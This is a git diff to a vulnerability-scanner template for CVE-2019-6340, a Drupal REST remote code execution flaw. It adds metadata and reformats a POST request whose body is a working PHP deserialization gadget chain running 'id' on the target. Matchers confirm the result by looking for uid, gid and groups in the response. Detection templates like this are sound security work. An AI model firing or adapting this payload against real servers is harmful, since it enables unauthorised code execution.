diff --git a/http/cves/2019/CVE-2019-6340.yaml b/http/cves/2019/CVE-2019-6340.yaml index 4c95f3e0f2..e92c1677ab 100644 --- a/http/cves/2019/CVE-2019-6340.yaml +++ b/http/cves/2019/CVE-2019-6340.yaml @@ -15,39 +15,32 @@ info: cvss-score: 8.1 cve-id: CVE-2019-6340 cwe-id: CWE-502 + epss-score: 0.97479 + cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.component:"drupal" - tags: cve,cve2019,drupal,rce,kev,cisa + vendor: drupal + product: drupal + tags: cve,cve2019,drupal,rce,kev http: - method: POST path: - '{{BaseURL}}/node/1?_format=hal_json' - body: '{ - "link": [ - { - "value": "link", - "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}" - } - ], - "_links": { - "type": { - "href": "http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default" - } - } -}' + body: '{ "link": [ { "value": "link", "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}" } ], "_links": { "type": { "href": "http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default" } } }' matchers-condition: and matchers: - type: word + part: body words: - "uid=" - "gid=" - "groups=" condition: and - part: body + - type: status status: - 200